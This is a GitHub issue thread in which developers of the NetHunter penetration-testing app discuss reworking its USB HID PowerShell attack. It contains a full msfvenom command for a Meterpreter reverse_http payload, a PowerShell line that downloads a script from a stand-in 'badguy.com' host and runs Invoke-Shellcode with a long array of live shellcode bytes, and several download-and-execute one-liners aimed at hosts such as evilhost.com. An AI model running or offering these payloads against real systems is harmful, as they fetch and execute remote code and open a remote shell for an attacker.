Open mubix opened 8 years ago
jmingov
commented
8 years ago Hello dears, @mubix @binkybear
Imo, 1,2 and 3 are easy to do (We have them already in the code) we need to remove, not to add for this ^^
Also the 'Other option (the generic one)' could be a great addition, so the user can have both in the app.
Jaime
binkybear
commented
8 years ago @mubix - After looking at Invoke-shellcode it still looks like we can pass -Shellcode. So we can generate the shellcode with msfvenom from code:
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.12 LPORT=744 -f powershell EXITFUNC=thread --platform windows -o /tmp/pwrshell_stringThen run powerball.py to make it into correct output shellcode. Finally, here is the output to /var/www/html/payload-url (TODO: we should probably change location)
iex (New-Object Net.WebClient).DownloadString("badguy.com/oopzs.ps1"); Invoke-Shellcode -Force -Shellcode @(0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0xe8,0x2,0x0,0x0,0xe8,0x97,0x0,0x0,0x0,0x2f,0x41,0x6a,0x35,0x52,0x6a,0x33,0x32,0x45,0x76,0x58,0x7a,0x67,0x33,0x4f,0x48,0x64,0x74,0x6b,0x47,0x45,0x53,0x51,0x54,0x54,0x32,0x32,0x4a,0x74,0x48,0x72,0x30,0x32,0x68,0x78,0x4a,0x68,0x51,0x61,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xed,0xe8,0x49,0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x8b,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x32,0x0,0xbb,0xe0,0x1d,0x2a,0xa,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5)TODO: We should add a progress bar dialogue to the update to show users whats happening.
Here is a test APK: MD5: 3b0e8b0ea056b880306fbbf95ecdcebe https://transfer.sh/WjWdD/nethunter-app-release.apk
binkybear
commented
8 years ago Updated with progress dialogue. Updated APK for testing:
thesle3p
commented
8 years ago I am concerned with something about this change: I Often use the USB HID attack in nethunter to execute powershell scripts other then invoke shellcode, would that still work, for example if I were to set the URL to "http://evilhost.com/empire-agent.ps1 it wouldn't run would it? I see the nethunter app looks to specifically execute the invoke shellcode cmdlet. Any chance a option could be added for a more generic download and execute attack?
binkybear
commented
8 years ago I believe we plan on integrating more with empire in the future. If you want a "generic" http to powershell I think that should be separate from this attack and probably should have its own tab or be made separate.
This attack was always specific for invoke shellcode script.
thesle3p
commented
8 years ago A more generic http to powershell tab would be really useful because I often have a need to download and execute pure powershell payloads.
On 01/28/2016 06:58 PM, binkybear wrote:
I believe we plan on integrating more with empire in the future. If you want a "generic" http to powershell I think that should be separate from this attack and probably should have its own tab or be made separate.
This attack was always specific for invoke shellcode script.
— Reply to this email directly or view it on GitHub https://github.com/offensive-security/nethunter-app/issues/114#issuecomment-176487774.
simonpunk
commented
8 years ago but I think these changes are taking more time to get the payload execute on target. Like first, we have to wait more than 30 seconds for the msfvenom to generate the shellcode, and when we execute the attack, it again takes around 20 seconds to output the very very very long encoded strings, and sometimes it happens to report error with powershell likely because of the long encoded string. So I personally think that it is not so practical in this way. And I prefer the previous editon more. But just my opinion here.
binkybear
commented
8 years ago @simonpunk - Well we can easily drop the shellcode generation or maybe generate it after the attack is launched. I could also enable --smallest in msfvenom although I'm not sure how much of a difference it would make.
Another possible avenue, and probably the best, would be add the shellcode directly to ps1 file here: https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1#L427. Then we could skip all the hid typing of shellcode, however you would still have to wait for msfvenom to generate it. It could probably be done early with a separate button though.
thesle3p
commented
8 years ago To be honest it would be simple and easy to just add a option to download and execute a powershell script using IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
On 01/28/2016 09:26 PM, binkybear wrote:
@simonpunk https://github.com/simonpunk - Well we can easily drop the shellcode generation or maybe generate it after the attack is launched. I could also enable --smallest in msfvenom although I'm not sure how much of a difference it would make.
Another possible avenue, and probably the best, would be add the shellcode directly to ps1 file here: https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1#L427. Then we could skip all the hid typing of shellcode, however you would still have to wait for msfvenom to generate it. It could probably be done early with a separate button though.
— Reply to this email directly or view it on GitHub https://github.com/offensive-security/nethunter-app/issues/114#issuecomment-176529735.
Thanks for the fixes in #113 - huge thanks to @jmingov in particular. Unfortunately "-Payload windows/meterpreter/reverse_https -Lhost 192.168.1.19 -Lport 4457" are no longer parameters of Invoke-Shellcode. It only takes a
-Shellcode,-ProcessId, and-Force. I attempted to use an older version of Invoke-Shellcode but unfortunately while it did work, the updated version of Metasploit no longer accepts the payload built into them.So my suggestions would be:
URL to Payload(just the text) in the app, toURL to Invoke-Shellcode.ps1so that it's clearer what is happening/needed.iex (New-Object Net.WebClient).DownloadString("www.badguy.com:8080"); Invoke-Shellcode -Forcewherewww.badguy.com:8080is the URL from theURL to Payloadoption as it is now.The other option is to make it much more generic and just have the URL option and tell them it needs to be an executable powershell script and then the only thing you need to worry about is "URL to Payload" and plug it into the DownloadString.